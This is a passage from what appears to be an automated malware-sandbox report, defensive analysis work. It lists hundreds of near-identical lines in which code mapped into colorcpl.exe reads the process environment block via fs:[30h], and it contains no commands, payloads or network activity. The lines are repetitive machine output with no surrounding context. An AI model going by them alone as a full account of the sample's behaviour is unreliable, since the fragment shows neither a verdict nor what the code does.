            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680E609 mov eax, dword ptr fs:[00000030h]2_2_2680E609
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA6C7 mov ebx, dword ptr fs:[00000030h]2_2_267CA6C7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA6C7 mov eax, dword ptr fs:[00000030h]2_2_267CA6C7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C66B0 mov eax, dword ptr fs:[00000030h]2_2_267C66B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CC6A6 mov eax, dword ptr fs:[00000030h]2_2_267CC6A6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26794690 mov eax, dword ptr fs:[00000030h]2_2_26794690
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26794690 mov eax, dword ptr fs:[00000030h]2_2_26794690
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685866E mov eax, dword ptr fs:[00000030h]2_2_2685866E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685866E mov eax, dword ptr fs:[00000030h]2_2_2685866E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26798770 mov eax, dword ptr fs:[00000030h]2_2_26798770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0770 mov eax, dword ptr fs:[00000030h]2_2_267A0770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0770 mov eax, dword ptr fs:[00000030h]2_2_267A0770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0770 mov eax, dword ptr fs:[00000030h]2_2_267A0770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0770 mov eax, dword ptr fs:[00000030h]2_2_267A0770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0770 mov eax, dword ptr fs:[00000030h]2_2_267A0770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0770 mov eax, dword ptr fs:[00000030h]2_2_267A0770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0770 mov eax, dword ptr fs:[00000030h]2_2_267A0770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0770 mov eax, dword ptr fs:[00000030h]2_2_267A0770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0770 mov eax, dword ptr fs:[00000030h]2_2_267A0770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0770 mov eax, dword ptr fs:[00000030h]2_2_267A0770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0770 mov eax, dword ptr fs:[00000030h]2_2_267A0770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0770 mov eax, dword ptr fs:[00000030h]2_2_267A0770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683678E mov eax, dword ptr fs:[00000030h]2_2_2683678E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268447A0 mov eax, dword ptr fs:[00000030h]2_2_268447A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26790750 mov eax, dword ptr fs:[00000030h]2_2_26790750
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2750 mov eax, dword ptr fs:[00000030h]2_2_267D2750
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2750 mov eax, dword ptr fs:[00000030h]2_2_267D2750
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C674D mov esi, dword ptr fs:[00000030h]2_2_267C674D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C674D mov eax, dword ptr fs:[00000030h]2_2_267C674D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C674D mov eax, dword ptr fs:[00000030h]2_2_267C674D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C273C mov eax, dword ptr fs:[00000030h]2_2_267C273C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C273C mov ecx, dword ptr fs:[00000030h]2_2_267C273C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C273C mov eax, dword ptr fs:[00000030h]2_2_267C273C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268107C3 mov eax, dword ptr fs:[00000030h]2_2_268107C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CC720 mov eax, dword ptr fs:[00000030h]2_2_267CC720
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CC720 mov eax, dword ptr fs:[00000030h]2_2_267CC720
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681E7E1 mov eax, dword ptr fs:[00000030h]2_2_2681E7E1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26790710 mov eax, dword ptr fs:[00000030h]2_2_26790710
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C0710 mov eax, dword ptr fs:[00000030h]2_2_267C0710
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CC700 mov eax, dword ptr fs:[00000030h]2_2_267CC700
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267947FB mov eax, dword ptr fs:[00000030h]2_2_267947FB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267947FB mov eax, dword ptr fs:[00000030h]2_2_267947FB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B27ED mov eax, dword ptr fs:[00000030h]2_2_267B27ED
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B27ED mov eax, dword ptr fs:[00000030h]2_2_267B27ED
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B27ED mov eax, dword ptr fs:[00000030h]2_2_267B27ED
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680C730 mov eax, dword ptr fs:[00000030h]2_2_2680C730
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679C7C0 mov eax, dword ptr fs:[00000030h]2_2_2679C7C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26814755 mov eax, dword ptr fs:[00000030h]2_2_26814755
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267907AF mov eax, dword ptr fs:[00000030h]2_2_267907AF
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681E75D mov eax, dword ptr fs:[00000030h]2_2_2681E75D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BA470 mov eax, dword ptr fs:[00000030h]2_2_267BA470
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BA470 mov eax, dword ptr fs:[00000030h]2_2_267BA470
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BA470 mov eax, dword ptr fs:[00000030h]2_2_267BA470
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2684A49A mov eax, dword ptr fs:[00000030h]2_2_2684A49A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B245A mov eax, dword ptr fs:[00000030h]2_2_267B245A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681A4B0 mov eax, dword ptr fs:[00000030h]2_2_2681A4B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA430 mov eax, dword ptr fs:[00000030h]2_2_267CA430
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678E420 mov eax, dword ptr fs:[00000030h]2_2_2678E420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678E420 mov eax, dword ptr fs:[00000030h]2_2_2678E420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678E420 mov eax, dword ptr fs:[00000030h]2_2_2678E420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678C427 mov eax, dword ptr fs:[00000030h]2_2_2678C427
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C8402 mov eax, dword ptr fs:[00000030h]2_2_267C8402
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C8402 mov eax, dword ptr fs:[00000030h]2_2_267C8402
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C8402 mov eax, dword ptr fs:[00000030h]2_2_267C8402
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267904E5 mov ecx, dword ptr fs:[00000030h]2_2_267904E5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816420 mov eax, dword ptr fs:[00000030h]2_2_26816420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816420 mov eax, dword ptr fs:[00000030h]2_2_26816420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816420 mov eax, dword ptr fs:[00000030h]2_2_26816420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816420 mov eax, dword ptr fs:[00000030h]2_2_26816420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816420 mov eax, dword ptr fs:[00000030h]2_2_26816420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816420 mov eax, dword ptr fs:[00000030h]2_2_26816420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816420 mov eax, dword ptr fs:[00000030h]2_2_26816420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C44B0 mov ecx, dword ptr fs:[00000030h]2_2_267C44B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267964AB mov eax, dword ptr fs:[00000030h]2_2_267964AB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2684A456 mov eax, dword ptr fs:[00000030h]2_2_2684A456
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681C460 mov ecx, dword ptr fs:[00000030h]2_2_2681C460
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C656A mov eax, dword ptr fs:[00000030h]2_2_267C656A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C656A mov eax, dword ptr fs:[00000030h]2_2_267C656A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C656A mov eax, dword ptr fs:[00000030h]2_2_267C656A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268105A7 mov eax, dword ptr fs:[00000030h]2_2_268105A7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268105A7 mov eax, dword ptr fs:[00000030h]2_2_268105A7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268105A7 mov eax, dword ptr fs:[00000030h]2_2_268105A7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26798550 mov eax, dword ptr fs:[00000030h]2_2_26798550
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26798550 mov eax, dword ptr fs:[00000030h]2_2_26798550
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE53E mov eax, dword ptr fs:[00000030h]2_2_267BE53E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE53E mov eax, dword ptr fs:[00000030h]2_2_267BE53E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE53E mov eax, dword ptr fs:[00000030h]2_2_267BE53E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE53E mov eax, dword ptr fs:[00000030h]2_2_267BE53E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE53E mov eax, dword ptr fs:[00000030h]2_2_267BE53E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0535 mov eax, dword ptr fs:[00000030h]2_2_267A0535
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0535 mov eax, dword ptr fs:[00000030h]2_2_267A0535
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0535 mov eax, dword ptr fs:[00000030h]2_2_267A0535
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0535 mov eax, dword ptr fs:[00000030h]2_2_267A0535
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0535 mov eax, dword ptr fs:[00000030h]2_2_267A0535
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0535 mov eax, dword ptr fs:[00000030h]2_2_267A0535
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26826500 mov eax, dword ptr fs:[00000030h]2_2_26826500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864500 mov eax, dword ptr fs:[00000030h]2_2_26864500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864500 mov eax, dword ptr fs:[00000030h]2_2_26864500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864500 mov eax, dword ptr fs:[00000030h]2_2_26864500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864500 mov eax, dword ptr fs:[00000030h]2_2_26864500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864500 mov eax, dword ptr fs:[00000030h]2_2_26864500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864500 mov eax, dword ptr fs:[00000030h]2_2_26864500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864500 mov eax, dword ptr fs:[00000030h]2_2_26864500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CC5ED mov eax, dword ptr fs:[00000030h]2_2_267CC5ED
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CC5ED mov eax, dword ptr fs:[00000030h]2_2_267CC5ED
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267925E0 mov eax, dword ptr fs:[00000030h]2_2_267925E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267965D0 mov eax, dword ptr fs:[00000030h]2_2_267965D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA5D0 mov eax, dword ptr fs:[00000030h]2_2_267CA5D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA5D0 mov eax, dword ptr fs:[00000030h]2_2_267CA5D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE5CF mov eax, dword ptr fs:[00000030h]2_2_267CE5CF
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE5CF mov eax, dword ptr fs:[00000030h]2_2_267CE5CF
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B45B1 mov eax, dword ptr fs:[00000030h]2_2_267B45B1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B45B1 mov eax, dword ptr fs:[00000030h]2_2_267B45B1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE59C mov eax, dword ptr fs:[00000030h]2_2_267CE59C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C4588 mov eax, dword ptr fs:[00000030h]2_2_267C4588
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26792582 mov eax, dword ptr fs:[00000030h]2_2_26792582
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26792582 mov ecx, dword ptr fs:[00000030h]2_2_26792582
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26810283 mov eax, dword ptr fs:[00000030h]2_2_26810283
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26810283 mov eax, dword ptr fs:[00000030h]2_2_26810283
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26810283 mov eax, dword ptr fs:[00000030h]2_2_26810283
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678826B mov eax, dword ptr fs:[00000030h]2_2_2678826B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26794260 mov eax, dword ptr fs:[00000030h]2_2_26794260
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26794260 mov eax, dword ptr fs:[00000030h]2_2_26794260
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26794260 mov eax, dword ptr fs:[00000030h]2_2_26794260
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26796259 mov eax, dword ptr fs:[00000030h]2_2_26796259
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268262A0 mov eax, dword ptr fs:[00000030h]2_2_268262A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268262A0 mov ecx, dword ptr fs:[00000030h]2_2_268262A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268262A0 mov eax, dword ptr fs:[00000030h]2_2_268262A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268262A0 mov eax, dword ptr fs:[00000030h]2_2_268262A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268262A0 mov eax, dword ptr fs:[00000030h]2_2_268262A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268262A0 mov eax, dword ptr fs:[00000030h]2_2_268262A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678A250 mov eax, dword ptr fs:[00000030h]2_2_2678A250
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678823B mov eax, dword ptr fs:[00000030h]2_2_2678823B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268662D6 mov eax, dword ptr fs:[00000030h]2_2_268662D6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A02E1 mov eax, dword ptr fs:[00000030h]2_2_267A02E1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A02E1 mov eax, dword ptr fs:[00000030h]2_2_267A02E1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A02E1 mov eax, dword ptr fs:[00000030h]2_2_267A02E1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A2C3 mov eax, dword ptr fs:[00000030h]2_2_2679A2C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A2C3 mov eax, dword ptr fs:[00000030h]2_2_2679A2C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A2C3 mov eax, dword ptr fs:[00000030h]2_2_2679A2C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A2C3 mov eax, dword ptr fs:[00000030h]2_2_2679A2C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A2C3 mov eax, dword ptr fs:[00000030h]2_2_2679A2C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26818243 mov eax, dword ptr fs:[00000030h]2_2_26818243
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26818243 mov ecx, dword ptr fs:[00000030h]2_2_26818243
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2684A250 mov eax, dword ptr fs:[00000030h]2_2_2684A250
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2684A250 mov eax, dword ptr fs:[00000030h]2_2_2684A250
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A02A0 mov eax, dword ptr fs:[00000030h]2_2_267A02A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A02A0 mov eax, dword ptr fs:[00000030h]2_2_267A02A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2686625D mov eax, dword ptr fs:[00000030h]2_2_2686625D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE284 mov eax, dword ptr fs:[00000030h]2_2_267CE284
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE284 mov eax, dword ptr fs:[00000030h]2_2_267CE284
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268163C0 mov eax, dword ptr fs:[00000030h]2_2_268163C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2684C3CD mov eax, dword ptr fs:[00000030h]2_2_2684C3CD
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268343D4 mov eax, dword ptr fs:[00000030h]2_2_268343D4
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268343D4 mov eax, dword ptr fs:[00000030h]2_2_268343D4
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E3DB mov eax, dword ptr fs:[00000030h]2_2_2683E3DB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E3DB mov eax, dword ptr fs:[00000030h]2_2_2683E3DB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E3DB mov ecx, dword ptr fs:[00000030h]2_2_2683E3DB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E3DB mov eax, dword ptr fs:[00000030h]2_2_2683E3DB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678C310 mov ecx, dword ptr fs:[00000030h]2_2_2678C310
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B0310 mov ecx, dword ptr fs:[00000030h]2_2_267B0310
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA30B mov eax, dword ptr fs:[00000030h]2_2_267CA30B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA30B mov eax, dword ptr fs:[00000030h]2_2_267CA30B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA30B mov eax, dword ptr fs:[00000030h]2_2_267CA30B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C63FF mov eax, dword ptr fs:[00000030h]2_2_267C63FF
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE3F0 mov eax, dword ptr fs:[00000030h]2_2_267AE3F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE3F0 mov eax, dword ptr fs:[00000030h]2_2_267AE3F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE3F0 mov eax, dword ptr fs:[00000030h]2_2_267AE3F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26868324 mov eax, dword ptr fs:[00000030h]2_2_26868324
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26868324 mov ecx, dword ptr fs:[00000030h]2_2_26868324
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26868324 mov eax, dword ptr fs:[00000030h]2_2_26868324
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26868324 mov eax, dword ptr fs:[00000030h]2_2_26868324
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A3C0 mov eax, dword ptr fs:[00000030h]2_2_2679A3C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A3C0 mov eax, dword ptr fs:[00000030h]2_2_2679A3C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A3C0 mov eax, dword ptr fs:[00000030h]2_2_2679A3C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A3C0 mov eax, dword ptr fs:[00000030h]2_2_2679A3C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A3C0 mov eax, dword ptr fs:[00000030h]2_2_2679A3C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A3C0 mov eax, dword ptr fs:[00000030h]2_2_2679A3C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267983C0 mov eax, dword ptr fs:[00000030h]2_2_267983C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267983C0 mov eax, dword ptr fs:[00000030h]2_2_267983C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267983C0 mov eax, dword ptr fs:[00000030h]2_2_267983C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267983C0 mov eax, dword ptr fs:[00000030h]2_2_267983C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
